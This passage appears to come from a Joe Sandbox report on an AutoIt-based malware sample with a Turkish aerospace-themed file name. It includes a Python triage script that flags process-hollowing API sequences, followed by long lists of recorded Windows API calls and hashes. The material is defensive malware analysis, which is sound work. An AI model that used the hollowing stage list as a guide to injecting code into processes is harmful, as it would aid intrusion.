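    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple    # raw tokens as printed; '?' means the sandbox could not resolve the value
    ref: int       # call-site address
    subcall: bool  # reached through a callee rather than directly from this function

def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Comma-split is enough for triage; a string argument containing a comma would be split too.
        args = tuple(t.strip() for t in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("sub") is not None))
    return calls

def parse_hex(token):
    # '00010007' -> 0x10007; '?' or a string literal -> None
    try:
        return int(token, 16)
    except ValueError:
        return None

# winnt.h x86 CONTEXT flags: CONTEXT_FULL for an x86 (WOW64) thread is 0x10007.
CONTEXT_I386 = 0x00010000
CONTEXT_FLAG_NAMES = {0x1: "CONTROL", 0x2: "INTEGER", 0x4: "SEGMENTS",
                      0x8: "FLOATING_POINT", 0x10: "DEBUG_REGISTERS", 0x20: "EXTENDED_REGISTERS"}

def decode_context_flags(value):
    arch = "i386" if value & CONTEXT_I386 else "unknown"
    return arch, [name for bit, name in CONTEXT_FLAG_NAMES.items() if value & bit]

# Stages of the RunPE / process-hollowing sequence (author's grouping, not a Joe Sandbox rule).
HOLLOWING_STAGES = {
    "create":  {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "Wow64GetThreadContext"},
    "memory":  {"ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory",
                "NtUnmapViewOfSection", "VirtualAllocEx", "NtAllocateVirtualMemory"},
    "resume":  {"SetThreadContext", "Wow64SetThreadContext", "ResumeThread", "NtResumeThread"},
}

def assess_hollowing(calls):
    seen = {s: sorted({c.api for c in calls if c.api in apis}) for s, apis in HOLLOWING_STAGES.items()}
    core = all(seen[s] for s in ("create", "context", "memory"))
    # Call sites in straight-line code grow with address, so create < context < memory is the
    # shape a hand-written hollowing routine has (ordering heuristic only).
    firsts = [min(c.ref for c in calls if c.api in HOLLOWING_STAGES[s])
              for s in ("create", "context", "memory") if seen[s]]
    notes = []
    for c in calls:
        flags = parse_hex(c.args[1]) if c.api in HOLLOWING_STAGES["context"] and len(c.args) >= 2 else None
        if flags is not None:
            arch, names = decode_context_flags(flags)
            notes.append(f"{c.api} ContextFlags=0x{flags:X} ({arch}: {'|'.join(names)})")
        if c.api == "ReadProcessMemory" and len(c.args) >= 4 and parse_hex(c.args[3]) == 4:
            notes.append("ReadProcessMemory nSize=4: pointer-sized read, consistent with fetching the "
                         "32-bit child's ImageBaseAddress from its PEB after GetThreadContext (heuristic)")
    verdict = "hollowing-like" if core else ("partial" if any(seen.values()) else "none")
    return {"verdict": verdict, "stages": seen, "in_order": firsts == sorted(firsts), "notes": notes}

# MEMORY_BASIC_INFORMATION constants from winnt.h, used to read a dump file name.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

def decode_dump_name(name):
    """ASSUMPTION (not stated on the page): .sdmp names are dot-separated
    pid.stage.id.base.protect.<?>.type.<?>; only base, protect and type are read."""
    f = name.removesuffix(".sdmp").split(".")
    protect, mtype = int(f[4], 16), int(f[6], 16)
    return {"base": int(f[3], 16), "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
            "type": MEM_TYPE.get(mtype, hex(mtype))}

if __name__ == "__main__":
    result = assess_hollowing(parse_api_lines(SAMPLE_APIS))
    print(result["verdict"], result["stages"], result["in_order"], *result["notes"], sep="\n")
    print(decode_dump_name(SAMPLE_DUMP))
```

A hit on the create, context and memory stages without a resume stage, as in this entry, only means that the rest of the sequence (SetThreadContext/ResumeThread, if present) lives in another function or outside the dumped region; treat the verdict as a pointer to where to read next in the disassembly, not as a conclusion. The nSize=4 note applies to a 32-bit child only; a PEB pointer read from a 64-bit child would be eight bytes.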
APIs
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 6abd7baa3376518c1bb51c8f218db881ab1e5133df9dde0999446d1fca7097f1
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 5731B771A00106DBC718DF58C685B69F7A6FB59310B6487A9E80ACB355DB31EDC2EBC0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 3c75d3bec4ac7d47977bdda826a84e7a7d185e59ab0aedcee4fc29053d5b9f09
• Instruction ID: 659c5336e7dcaee65d5321fd990584017940599193f5d0807dae4227c3f45fd3
• Opcode Fuzzy Hash: 3c75d3bec4ac7d47977bdda826a84e7a7d185e59ab0aedcee4fc29053d5b9f09
• Instruction Fuzzy Hash: FE4108B4904341DFDB24DF14C454B1ABBE1BF45314F0988ACE8998B762C775E849DF52
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8adda755b85ae478ad31ab38e0c2e0c7d30360b95ce5ac50b39ba54cc90d6fef
• Instruction ID: 586cbb32e3fef4049e6f3b3a3b1b79a3b12249cc48cc75963bad6cebb1896b89
• Opcode Fuzzy Hash: 8adda755b85ae478ad31ab38e0c2e0c7d30360b95ce5ac50b39ba54cc90d6fef
• Instruction Fuzzy Hash: 2121F376409202EFC311AF24D843AF6B7F4EF82322B11819EED918B862CB3059478F91
APIs
  • Part of subcall function 00FA4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00FA4BEF
  • Part of subcall function 00FC525B: __wfsopen.LIBCMT ref: 00FC5266
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E0F
  • Part of subcall function 00FA4B6A: FreeLibrary.KERNEL32(00000000), ref: 00FA4BA4
  • Part of subcall function 00FA4C70: _memmove.LIBCMT ref: 00FA4CBA
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
• String ID:
• API String ID: 1396898556-0
• Opcode ID: 93873e50ac87ee03824d2a1de8ae0a2d61f449e3657d0f21991fb1f7dff5de21
• Instruction ID: 9f5523c4d58701c9caa53ba3f268e6c49828d5d33bdf65c552e1e6333b5bb635
• Opcode Fuzzy Hash: 93873e50ac87ee03824d2a1de8ae0a2d61f449e3657d0f21991fb1f7dff5de21
• Instruction Fuzzy Hash: 9A11E772600206ABCF11FF70CC52FAD77A5AFC5750F10842DF541A7181DAFAA901B760
APIs
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 7151055c6db33059c6de199c1efec11c73f4197a826950a6c9412121ef2ea657
• Instruction ID: ba7f12f455bd979bfe991b1294d35f43cbeec5ef03bcfee66b8163a6f266ae58
• Opcode Fuzzy Hash: 7151055c6db33059c6de199c1efec11c73f4197a826950a6c9412121ef2ea657
• Instruction Fuzzy Hash: BA2128B4908342DFDB24DF64C444B1ABBE1BF85314F05896CF88957762D735E809EB52
APIs
• __lock_file.LIBCMT ref: 00FC48A6
  • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
• Opcode ID: 72d37ac8a1dba33d021e90435bcbc25204ed89934f86894ab6b436411e96c494
• Instruction ID: 4193bd760e2fdcf41ae8f61189b265c1af3ac74fc316dfa2a90dad0097fcb0d7
• Opcode Fuzzy Hash: 72d37ac8a1dba33d021e90435bcbc25204ed89934f86894ab6b436411e96c494
• Instruction Fuzzy Hash: 65F0AF3190160BEBDF11AFA48E07FAE36A0AF10376F15841CB8249A1D1CB7C9952FB51
APIs
• FreeLibrary.KERNEL32(?,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E7E
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 0288db6ac8b28077c2530a5bb096c8be7f4246dfab3942125693659b2a694f3d
• Instruction ID: aa7a5c94f1d965d2e59451124a1292d8f2bfebf06224fd647b6883fb6ffc72d6
• Opcode Fuzzy Hash: 0288db6ac8b28077c2530a5bb096c8be7f4246dfab3942125693659b2a694f3d
• Instruction Fuzzy Hash: D8F039B1901712CFCB349F64E4D4812BBF5BF963793208A3EE1D682610C7B2A880EF40
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FC07B0
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: LongNamePath_memmove
• String ID:
                                                                                                                                    • API String ID: 2514874351-0
                                                                                                                                    • Opcode ID: e74a3f2db7de7e65743ccadef0af677b22f30cc14c0baa28b7fada755257f001
                                                                                                                                    • Instruction ID: b2e0b5136b76bcfcc9ef7f414eaadf5ac5813d497ae0bf6632417b52ae861629
                                                                                                                                    • Opcode Fuzzy Hash: e74a3f2db7de7e65743ccadef0af677b22f30cc14c0baa28b7fada755257f001
                                                                                                                                    • Instruction Fuzzy Hash: B7E0867690422857C720A5989C05FEA77ADDB896A0F0441B6FC08D7208D9659C948691
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                    • Instruction ID: c7751e39f082deacf9ddc5725894e1c5f5d5d234e51c020065c4271ee66983cd
                                                                                                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                                                                    • Instruction Fuzzy Hash: 8AE092B0504B405BE7398A28D801BA377E1BB05304F04085DF2EA83242EBA278418759
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wfsopen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 197181222-0
                                                                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                    • Instruction ID: 363b54cac752c7292ea1e70bc9b8d1e9f05555b38f198dc4e87b9e4d82140d63
                                                                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                    • Instruction Fuzzy Hash: 2EB0927644020C77CE012A82EC03F897B599B42BA4F408020FB0C18162A677A6A4AA89
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 01260849
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0125E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_125e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                    • Instruction ID: 9c038a71ac94c079b5cf1afd336b9247957b97cf7465039c2950c4e11174376d
                                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                    • Instruction Fuzzy Hash: 0BE0E67494020DDFDB00DFF4D54969D7BB4EF04301F100161FD01D2280D6309D50DA62
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0102CB37
                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0102CB95
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0102CBD6
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0102CC00
                                                                                                                                    • SendMessageW.USER32 ref: 0102CC29
                                                                                                                                    • _wcsncpy.LIBCMT ref: 0102CC95
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0102CCB6
                                                                                                                                    • GetKeyState.USER32(00000009), ref: 0102CCC3
                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0102CCD9
                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0102CCE3
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0102CD0C
                                                                                                                                    • SendMessageW.USER32 ref: 0102CD33
                                                                                                                                    • SendMessageW.USER32(?,00001030,?,0102B348), ref: 0102CE37
                                                                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0102CE4D
                                                                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0102CE60
                                                                                                                                    • SetCapture.USER32(?), ref: 0102CE69
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0102CECE
                                                                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0102CEDB
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0102CEF5
                                                                                                                                    • ReleaseCapture.USER32 ref: 0102CF00
                                                                                                                                    • GetCursorPos.USER32(?), ref: 0102CF3A
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0102CF47
                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0102CFA3
                                                                                                                                    • SendMessageW.USER32 ref: 0102CFD1
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0102D00E
                                                                                                                                    • SendMessageW.USER32 ref: 0102D03D
                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0102D05E
                                                                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0102D06D
                                                                                                                                    • GetCursorPos.USER32(?), ref: 0102D08D
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0102D09A
                                                                                                                                    • GetParent.USER32(?), ref: 0102D0BA
                                                                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0102D123
                                                                                                                                    • SendMessageW.USER32 ref: 0102D154
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0102D1B2
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0102D1E2
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0102D20C
                                                                                                                                    • SendMessageW.USER32 ref: 0102D22F
                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0102D281
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0102D2B5
                                                                                                                                      • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0102D351
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                                    • API String ID: 3977979337-4164748364
                                                                                                                                    • Opcode ID: f7bc45082040a00fb99d23a72a430dc53bb3c1c5938545b30aedeb1bdf2e070e
                                                                                                                                    • Instruction ID: 48e950545c859bc1963fe4bf84ca187b1b0a1c35bcaa9f720bf38efd7cba2c9c
                                                                                                                                    • Opcode Fuzzy Hash: f7bc45082040a00fb99d23a72a430dc53bb3c1c5938545b30aedeb1bdf2e070e
                                                                                                                                    • Instruction Fuzzy Hash: D542DC78204291AFE731CF28C948EAABFE5FF49350F140549FAD5872A1C736D844EB92
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memmove$_memset
                                                                                                                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                                    • API String ID: 1357608183-1798697756
                                                                                                                                    • Opcode ID: 7c48447fc232a9e774518daca45066d242d01dc67aac5cd4c8daaa4c46625858
                                                                                                                                    • Instruction ID: 138e46244e7028bdb29ff0dca188d5a37ef0283affc52ee9ce78dd16fb2153fd
                                                                                                                                    • Opcode Fuzzy Hash: 7c48447fc232a9e774518daca45066d242d01dc67aac5cd4c8daaa4c46625858
                                                                                                                                    • Instruction Fuzzy Hash: CD93A275E04219DBDB24DF98C881BFDB7B1FF48720F24816ADA45AB290E7749D81EB40
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00FA48DF
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FDD665
                                                                                                                                    • IsIconic.USER32(?), ref: 00FDD66E
                                                                                                                                    • ShowWindow.USER32(?,00000009), ref: 00FDD67B
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00FDD685
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FDD69B
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00FDD6A2
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDD6AE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00FDD6BF
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00FDD6C7
• AttachThreadInput.USER32(00000000,?,00000001), ref: 00FDD6CF
• SetForegroundWindow.USER32(?), ref: 00FDD6D2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD6E7
• keybd_event.USER32(00000012,00000000), ref: 00FDD6F2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD6FC
• keybd_event.USER32(00000012,00000000), ref: 00FDD701
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD70A
• keybd_event.USER32(00000012,00000000), ref: 00FDD70F
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00FDD719
• keybd_event.USER32(00000012,00000000), ref: 00FDD71E
• SetForegroundWindow.USER32(?), ref: 00FDD721
• AttachThreadInput.USER32(?,?,00000000), ref: 00FDD748
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
